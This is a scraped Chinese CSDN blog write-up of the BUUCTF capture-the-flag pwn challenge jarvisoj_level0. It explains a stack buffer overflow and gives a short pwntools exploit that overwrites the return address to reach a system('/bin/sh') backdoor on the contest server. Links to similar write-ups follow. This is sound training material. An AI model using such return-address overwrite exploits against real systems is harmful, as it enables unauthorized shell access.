buuctf pwn06

最新推荐文章于 2024-08-26 17:02:14 发布

曾经满眼皆是她

最新推荐文章于 2024-08-26 17:02:14 发布

阅读量38

点赞数

文章标签： 1024程序员节

本文链接：https://blog.csdn.net/weixin_74861133/article/details/134023061

版权

jarvisoj_level0 1

1.checksec

在这里插入图片描述

2.ida

在这里插入图片描述
进入函数vulnerable_function()

发现 buf输入是0x80(136) 而read能输入最大字数是0x200(512),可能存在栈溢出漏洞，shift+f12发现后门函数system(“/bin/sh”)，记住这个地址40059a

exp如下：

from pwn import*
p=remote('node4.buuoj.cn',28220)
payload=b'a'*136+p64(0x40059A)
p.sendline(payload)
p.interactive()

cat flag
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

曾经满眼皆是她

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

BUUCTF PWN rip1 WP

m0_54262894的博客

07-31

2640

BUUCTF PWN rip 1 这是一个WP，也是一个自己练习过程的记录。先把文件放入pwn机中检查一下，发现并没有开启保护，所以应该是一道简单题我们运行一下试试，它让你输入一段字符然后将字符输出。把文件放在ida中查看一下发现main函数并不复杂，只是定义了一个 s ，而且我们很容易就能找到栈溢出的点，我们都知道gets函数是一个危险函数，对于我们来说它可以接受到无限的字符，所以这里就是我们要pwn掉的点。我们双击 s ，看它有多少空...

BUUCTF PWN-堆题总结 2021-09-27

m0_56897090的博客

09-27

2144

文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019

参与评论您还未登录，请先登录后发表或查看评论

buuctf pwn解题

2301_80477504的博客

02-01

562

BUUCTF PWN-RIP详解

weixin_43780092的博客

09-07

5321

BUU CTF PWN 入门知识详解

BUUCTF PWN（2）

qq_60794823的博客

09-28

256

首先先用checksec查看开启了什么保护可以看到只开启了NX保护，即堆栈不可执行用32位的IDA打开附件，shift+f12查看字串打开main函数查看vuln函数，发现存在栈溢出漏洞的函数，**fgets(s, 32, edata)**这里对gets作出了限制，32（0x20）而s的大小0x3c>0x20所以不能造成溢出。这道题就不能解决了吗，结果肯定不是这样的仔细查看C代码可以发现，函数实现了字符串替换，将I替换为you，并将结果重组赋值给s。

BUUCTF Pwn pwn1_sctf_2016

MrTreebook的博客

12-05

1339

BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址点击下载题目 2.checksec检查保护运行一下看看 3.IDA分析看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF

BUUCTF pwn

L0g1c的博客

01-30

1717

第一道：第一步：连接nc靶场第二步：连接靶场后，执行 ls 命令，展示该靶场下目录文件。第三步：里有个 flag文件使用 cat命令进行查看。得到flag

buuctf pwn1_sctf_20161

m0_74125780的博客

08-26

142

然后又发现有个fgets函数，但是它限制只有32个字节，双击s查看s的长度，0x3c，有60个字符长度，但是只能输入32个字符所以无法造成栈溢出。但观察函数的内容，并nc一下，发现I可以替换成you。所以输入20个I就刚好满足60长度，再加上4。首先用checksec检查，发现是32位的，所以用32位的ida打开。速度找到system函数，查看它的地址，记下来，0x8048F0D。最后编写脚本，运行得到flag。

buuctf pwn入门1

weixin_63231007的博客

07-07

1470

buuctf pwn 前几道简单栈溢出&格式化字符串漏洞

BUUCTF PWN（1）

qq_60794823的博客

09-27

1056

首先checksec起手发现没有打开任何防护，是64位amd文件，使用IDA反汇编瞅一瞅首先shift+f12查看字串发现/bin/sh和system跟进查看/bin/sh的返回地址查看main函数的反编译代码发现**gets(s, argv)**栈溢出漏洞，没有限制s的输入大小点开s查看s的内存大小发现距离返回地址为0XF+0X8构造payload：‘a’ * 0x23 + p64(0x401186)发现连接超时。

buuctf pwn ubuntu20的自己搭建运行环境

11-15

pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334

BUUCTF pwn rip

weixin_55190422的博客

11-03

367

现在开始是记录我个人对BUU上PWN题的刷题记录。首先是一个ELF文件，放到Linux里面来看。首先老套路checksec一下接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段我们发现里面有个系统调用函数。我们查看下汇编代码我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数所以payload: from pwn import * p = remote('node4.buuoj.cn',...

Java核心技术.卷2.高级特性.原书第12版.中文

11-08

Java核心技术.卷2.高级特性.原书第12版.中文

【java毕业设计】springboot共享经济背景下校园闲置物品交易平台(springboot+mysql+说明文档).zip

11-08

项目经过测试均可完美运行！环境说明：开发语言：java 框架：ssm jdk版本：jdk1.8 数据库：mysql 5.7+ 数据库工具：Navicat11+ 管理工具：maven 开发工具：idea/eclipse 部署容器：tomcat7+

anscombe.csv

最新发布

11-08

anscombe

大模型备案推进，AI生成内容商业化进程加快

11-08

内容概要：文章介绍了自2023年8月以来中国AIGC领域的最新动态和发展趋势，强调了百度、商汤等公司在大模型方面的重要进展及备案工作的积极影响。具体而言，国家网信办发布的《生成式人工智能服务管理办法（征求意见稿）》标志着政策对大模型的规范化管理进入实施阶段，促进了AIGC从技术研发走向商业化应用的步伐。此外，报告还列出了多个上市公司的中期财报，展示它们在此转型期内的业绩变化情况。适合人群：对AI及计算机视觉感兴趣的研究者、开发者以及企业管理人员。使用场景及目标：适用于希望了解当前AIGC领域发展趋势和政策环境的机构和个人；旨在帮助投资者识别潜在投资机会。其他说明：尽管许多公司取得了良好的进展，但也提醒关注供应链、政策支持及国内替代等风险因素。

基于Android ——MyDate 好看的日历，效果明显。.zip

11-08

内容概要：本资源聚焦 Android 编程实战，包含毕业设计示例、完整的 Android 项目源码及文档分享。采用 MVC 模式进行架构设计，结合 JSP 技术与 SQL Server 2000 数据库管理系统，实现高效的 Android 应用开发。适用人群：Android 开发初学者、计算机专业学生进行毕业设计参考、希望提升 Android 开发技能的程序员。实用场景及目标：适用于开发各类 Android 应用项目，帮助开发者快速构建稳定、功能丰富的应用程序，同时为毕业设计提供优质的模板和思路。说明：资源提供了详细的代码注释和文档说明，方便学习者理解和上手，助力提升 Android 开发能力和项目实战经验。

大学心理咨询管理子系统 SSM毕业设计附带论文.zip

11-08

大学心理咨询管理子系统 SSM毕业设计附带论文启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B

mysql8 docker 镜像

11-08

mysql8 docker 镜像下载后直接导入docker load -i mysql.tar